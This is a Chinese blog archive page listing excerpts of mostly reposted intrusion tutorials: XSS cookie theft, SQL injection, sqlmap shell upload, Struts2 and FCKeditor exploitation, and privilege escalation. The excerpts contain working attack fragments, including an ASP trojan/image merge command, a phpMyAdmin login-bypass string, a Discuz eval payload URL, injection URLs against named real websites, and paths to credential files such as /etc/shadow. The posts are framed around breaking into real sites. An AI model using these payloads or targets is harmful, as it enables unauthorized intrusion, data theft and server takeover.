自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(73)
  • 资源 (4)
  • 收藏
  • 关注

转载 CreateProcess的用法

使用编译器vs2008。 第一、第二个参数的用法: 例子:使用ie打开指定的网页。注意第二个参数是 可执行文件+命令行参数 [cpp] view plaincopy#include "stdafx.h"  #include    #include      int main(int argc, char* argv[])   {       

2013-10-09 10:16:37 1013

转载 通过HTTP协议利用VC++上传图片至服务器

由于项目的临时需求,需要将以前抓拍在本机的BMP图片上传至服务器。本文主要记录如何解决这个问题。我们打算用http协议来上传数据,因此要用http协议的POST方式。首先,要理解http的POST协议。它一般由三部分组成:协议头,具体内容以及协议尾。如下例所示:POST /upload_file/UploadFile HTTP/1.1Accept: text/plain, */

2013-09-30 14:18:25 921

转载 漫谈反射xss利用.txt

晚上无聊,没打草稿,想到哪,写到哪,凑合看吧.先打个作者:Y35U1,反射xss大吗?反射xss相比flashxss和存储xss要多多了.so对于用户基数越大的网站,反射xss的威力就越大因为多嘛,所以利用者会大增。再者,存储的封的会快,而反射的封的相对不及时。xss中,普遍认为存储的危害最大,那是要看你X谁了如果你要x管理员,那肯定是存储的危害大如果你要x更多的人(跟你同等身

2013-09-04 16:33:48 956 1

转载 ASP木马

一、木马生成asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用 图片和木马合并命令:copy 1.gif /b + asp.asp /a asp.gif 二、木马上传如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。     1、如果后台数据库是以asp格式

2013-09-04 16:29:19 786

转载 EASYNEWS新闻管理系统 v1.01 正式版

实例一:“一句话木马”入侵“EASYNEWS新闻管理系统”     “EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。Step1 搜索入侵目标    使用了“EASYNEWS新闻管理系统

2013-09-04 16:24:06 1071

转载 当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时

方法:上传一个shtm文件, 内容为:直接请求这个shtm文件, conn.asp就一览无遗, 数据库路径也就到手啦!解析:就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示conn.asp其中的内容。前提:服务器的对shtm或者shtml的扩展没有删除!至于con

2013-09-04 16:23:04 776

转载 入侵提权过程中猜解linux路径与windows路径,网站路径暴力

/usr/local/Zend/etc/php.ini1.LINUX常见路径:/etc/passwd/etc/shadow/etc/fstab/etc/host.conf/etc/motd/etc/ld.so.conf/var/www/htdocs/index.php/var/www/conf/httpd.conf/var/www/htdocs/

2013-09-04 16:10:59 736

转载 Python完全新手教程

原文:http://www.cnblogs.com/taowen/articles/11239.aspxPython完全新手教程作者:taowen, billriceLesson 1 准备好学习Python的环境下载的地址是:www.python.org为了大家的方便,我在校内作了copy:http://10.1.204.2/tool/compile

2013-09-01 17:43:31 580

转载 小谈入侵踩点技术

转载请注明小3出品 谢谢题记这个东西其实整理了很久了就放在笔记里,写了3页多,在些朋友的唆使下我就写出来吧反正都早不是什么秘密了,就给菜鸟提个醒,让老鸟见个笑吧-------------------------------------------- -小3----------------------------------------------------

2013-08-26 11:20:39 947

转载 sqlmap注入点上传shell

借鉴 http://www.2cto.com/Article/201206/138091.html 俺稍微改了一下 - = 凑合着用 反正我特么的拿到shell了. 记录开始. sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell [14:39:11] [IN

2013-08-14 12:09:31 3680

转载 fck在上传文件的时候 FCKeditor 报错

信息如下:This file uploader is disabled. Please check the"editor/filemanager/connectors/php/config.php" file.报错的原因:是FCKeditor的安全机制阻止你上传文件,上传文件牵扯到很多的网站漏洞,FCKeditor要求对其配置文件进修改,修改$Config['Enabled']= fa

2013-08-12 15:37:26 805

转载 简述某次拿下外国大学网站(Mailman private.py 目录跳转漏洞)

这次说个端口的。    很多人觉得X-Scan过时了,几乎没有人用X-Scan了。如果某些小黑兴起,想搞下国外网站,不是拿着小黑、明小子一顿乱扫就是工具的狂轰。一点技术含量都没有,实在让人无奈。    前几天还是前几个小时,tank还问我,怎么php的手工注入语句那么简单?我说样子简单不代表难度简单。在中国,只要是存在注入点的网站几乎都被入侵遍了,但是细数他们的手法,还是工具,或者是泛滥的

2013-08-12 10:06:50 2246

转载 跨站脚本攻击XSS攻击与防范指南

文章目录 XSS攻击与防范指南... 1 第一章、XSS的定义... 1 第二章、XSS漏洞代码... 1 第三章、利用XSS盗取cookies. 3 第四章、防范XSS漏洞... 4 第四章、XSS攻击方法... 4 第六章、利用Flash进行XSS攻击... 6 第七章、上传文件进行XSS攻击... 7 第八章、利用XSS

2013-08-08 20:28:49 907

转载 如何搭建本地WordPress

我认为学习搭建本地WordPress是第一步也是至关重要的一步,我们以后所使用的博客可不再像QQ空间那样简单。必须经过本地的调试,确保正确无误后才可上线。千万不要没有经过本地调试的代码就直接上传到了服务器上,也没有备份,最后页面全部错位,惨不忍睹。为了避免这种悲剧的发生,我们应该在主题修改完成后放在本地先测试一下是否可用,看看效果如何。今天就来介绍一下如何在Windows下搭建本地Word

2013-08-06 15:06:26 617

转载 脚本安全的本质 PHP+MYSQL

脚本安全的本质 PHP+MYSQL一   前言     问题的存在     从代码级别上,也就是应用层次上考虑代码安全的话(也就是不考虑底层的语言本身等问题的漏洞),脚本安全问题就是函数和变量的问题。变量直接或者间接的接收用户不安全的的输入,由于php本身的特性,在php中更容易发现这种变量的混乱(很多php程序都用来定义以及初始化以及接收变量,可以直接在程序中使用$id这样的

2013-08-01 11:47:31 695

转载 MSSQL手工盲注总结

原文:http://hi.baidu.com/microjordan45/item/bd2c33d74ae813d8241f403e作者:oldjun好多人贴了2005注入语句,基本是显错模式的,如果显错,很多工具还是可以用的;但盲注,工具貌似就不咋地了,pangolin注不了2005,其他2005注入的注入工具对于盲注貌似也很感冒;网上没几个盲注语句,于是平时用到的时候自己写

2013-07-31 17:15:58 2832

转载 超简单利用burpsuite爆破wordpress后台密码

原文:http://www.myhack58.com/Article/html/3/8/2013/39713.htm什么是 Burp Suite?Burp Suite 是用于攻击 web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息,持久性,认证,代理,日志,警报的一个强大的可扩

2013-07-30 20:54:31 8659 1

转载 如何渗透测试WordPress网站

原文:http://www.freebuf.com/articles/web/5264.html前言英语水平有限,许多地方翻译的不是很通顺,请各位海涵。初见该文章便对文章作者很是佩服,因为在文章中详细的讲述了每一个步骤,这对于初学者来说尤为难得。所以决定将该文章翻译出来,供大家借鉴学习。正文原文题目:How Hackers Target and Hack Your Site

2013-07-26 10:38:30 3156

转载 phpmyadmin万能密码

phpmyadmin 2.11.3phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入:‘localhost’@'@”不用填入密码,可以直接登录,管理权限哦。

2013-07-25 13:42:32 6495

转载 XSS获取cookie并利用

获取cookie利用代码cookie.aspxxmsg = Request("msg")   //获取提交过来的msg变量,也就是cookie值set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象set thisfile = fs.OpenTextFile(t

2013-07-11 10:56:36 1795

转载 IIS5 UNICODE 编码漏洞

前2天一直在讲网络监听,虽然我觉得很有必要,但好多人都发来消息说没什么太多兴趣。虽然还是很想讲这个,但因为大家有意见,就不说。经过快半个月的学习,我想如果你很认真的在看的话的,我想你的基本功已经很好了.今天开始我会开始由一些详细的攻击或其他的方法开始说了,有些地方我就不详细说明了,如果有问题可以发贴来问 回到话题,unicode 漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力将主页改

2013-07-11 10:14:16 819

转载 一个绝种的漏洞——IIS 5.1 Directory Authentication Bypass

Bugtraq ID: 41314CVE ID:CVE-2010-2731CNCVE ID:CNCVE-20102731 漏洞发布时间:2010-07-01漏洞更新时间:2010-09-14 漏洞起因:访问验证错误危险等级:低 影响系统:Microsoft IIS 5.1  危害:远程攻击者可以利用漏洞

2013-07-11 10:12:57 1736

转载 struts2漏洞利用总结

原文:http://www.hack1990.com/cat_2/1235.html这东西一开始下到还不会利用这篇文章写的不错但是关键字不咋好用比较少然后就开始了批量拿了并且自己和朋友也想了一些关键字Inurl:index.actionInurl:商城.achtion (商城比较多)Inurl:index.achtion 标题:apache struts2 In

2013-07-10 10:13:51 2426

转载 Struts2简单入侵方法

原文:http://page.renren.com/601190241/note/860441395咳咳。。正题来了。上一篇文章基本都是抄别人的。。这篇文章自己写啦~猪头君让俺不要偷懒。于是菌菌就来更新啦!struts2执行漏洞的攻击方式也不外乎两种,手工和工具【嘿嘿嘿。。本文就先讲工具吧。工具永远是最简单的。。目前我见过的攻击工具有两个,一个是工具猫魔盒中的struts利用。

2013-07-10 10:01:48 1114

转载 Fckeditor漏洞利用总结

Fckeditor漏洞利用总结 查看编辑器版本FCKeditor/_whatsnew.html————————————————————————————————————————————————————————————— 2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。——————————————————————————

2013-05-13 17:49:30 878

转载 Discuz 7.2漏洞入侵图解

Discuz 7.2漏洞入侵图解找到一个论坛,注册一个账号注册好后,使用exp复制以下代码:http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11

2013-05-06 21:28:38 4346 1

转载 Nginx %00空字节执行任意代码(php)漏洞

漏洞版本:nginx 0.5.*nginx 0.6.*nginx 0.7 <= 0.7.65nginx 0.8 漏洞描述:Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginxNgnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中

2013-05-06 15:34:04 2007

转载 利用SQLMap进行cookie注入

SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用到cookie注入,一遇到cookie注入就去使用注入中转工具,比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入,就研究了一下,发现其实sqlmap进行cookie注入很简单的。测试URL: 参数获取使用的是

2013-05-05 22:09:25 1984

转载 SQLMAP自带的绕过脚本 --tamper

首先这个文章我是转来的 http://www.chuhades.com/post/19590b_4cc51f 确实很实用,就当记录一下吧,方便日后查询。 apostrophemask.py UTF-8编码 Example: * Input: AND '1'='1' * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

2013-05-05 20:53:06 1085

转载 如何使用SQLMap绕过WAF

WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs。svn下载最新版本的sqlmapsvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-de

2013-05-05 20:49:51 756

转载 查找后台

1.工具辅助查找如大家常用的:明小子、啊D、wwwscan以及一些列目录工具:Acunetix Web Vulnerability Scanner 、JSky、IntelliTamper、Netsparker...等等2.网站资源利用如:网站根目录Robots.txt文本、图片路径爆后台、查看网站底部版权信息是否有连接、通过网站里的文件名查询源码下载

2013-04-29 17:47:43 929

转载 总结的查找网站后台N种方法

1.工具辅助查找如大家常用的:明小子、啊D、wwwscan以及一些列目录工具:Acunetix Web Vulnerability Scanner 、JSky、IntelliTamper、Netsparker...等等2.网站资源利用如:网站根目录Robots.txt文本、图片路径爆后台、查看网站底部版权信息是否有连接、通过网站里的文件名查询源码下载

2013-04-29 14:17:50 846

转载 入侵提权过程中猜解linux路径与windows路径,网站路径暴力

/usr/local/Zend/etc/php.ini1.LINUX常见路径:/etc/passwd/etc/shadow/etc/fstab/etc/host.conf/etc/motd/etc/ld.so.conf/var/www/htdocs/index.php/var/www/conf/httpd.conf/var/www/htdocs/

2013-04-29 13:43:47 1643

转载 php+mysql入侵常见思路

php+mysql注入方面的文章已经是很多了,我最近帮朋友架设一个php+mysql的站,考虑安全性于是又重新看了看那些网上注射文章,自己做了点测试,总结一下。发到blog上来是为了留个底,便于以后查阅。mysql的限制还是很多,没有mssql那么强大的存储过程,也没有mssql那么方便的系统表(mysql自带mysql数据库是需要专门赋予访问权限或者root权限才可以访问的)。在我测试的

2013-04-26 23:39:01 1510

转载 MySQL 盲注最全实例讲

作者:YoCo Smart来自:Silic Group Hacker Army网址:http://blackbap.org本文实例来自习科论坛交流三群。这个注入点可以使用错误回显注入来爆数据,本文出于讲解的目的,使用更麻烦的盲注。阅读本文,需要有一点点SQL 基础。盲注理解起来其实非常简单,就是做起来非常费劲我们先来看注入点,是一个B2B 网站建站公司:http://w

2013-04-19 15:47:42 1792

转载 注入的几个小参数

作者:YoCo Smart来自:Silic Group Hacker Army网址:http://blackbap.org直接看地址吧:rekguitars.com/english.php?site=dir&nr=-2+union+select+1,2,concat(@@version_comment,0x5c,@@datadir,0x5c,@@tmpdir,0x5c,@@ve

2013-04-19 13:26:59 705

转载 [实例] 简单搞定联合查询注入字段间编码不同无法显示内容问题

作者:YoCo Smart来自:习科信息技术 Silic Grouphttp://blackbap.org注入的时候往往能碰到这样一种情况:有显示位,但是无法显示内容,甚至连database()都无法显示。今天找到一个绝好的例子来讲这样的一种情况。注入点:http://www.tkfd.or.jp/research/theme/index.php?id=1导致这种情况出现的原因

2013-04-19 12:55:55 984

转载 再谈联合查询注入字段间编码不同无法显示内容问题

作者:小D来自:Silic Group Hacker Army转载请注明:http://blackbap.org首先我们来看这样的一个文章:简单搞定联合查询注入字段间编码不同无法显示内容问题http://bbs.blackbap.org/thread-1646-1-1.html这种EUC日本语言的网站用hex无可非议,但是如果遇到utf-8编码和lang=en啊西欧啊什么的

2013-04-19 12:55:26 666

转载 php爆路径方法收集

1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。www.xxx.com/news.php?id=149′ 2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。www.xxx.com/researcharchive.php?i

2013-04-17 00:21:24 1071

转载 Union和Union All的区别

假设我们有一个表Student,包括以下字段与数据: [c-sharp] view plaincopydrop table student;    create table student  (  id int primary key,  name nvarchar2(50) not null,  score

2013-04-07 14:10:25 518

U盘读写的完整程序,包括初始化,文件格式,以及数据包,都有详细说明

U盘读写的完整程序,(包括初始化,文件格式,以及数据包,都有详细说明)

2012-09-14

lpk劫持代码

经典的lpk劫持代码,对于刚接触劫持dll的人来说,很容易上手!

2012-09-14

飞鸽传书源码详解

了解飞鸽传书代码的原理,对于初学网络编程的人来说很有用!

2012-09-14

用汇编-从零学习病毒编写

病毒入门书籍,汇编虽然看似很难,但是这个本书讲得很仔细。

2012-09-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除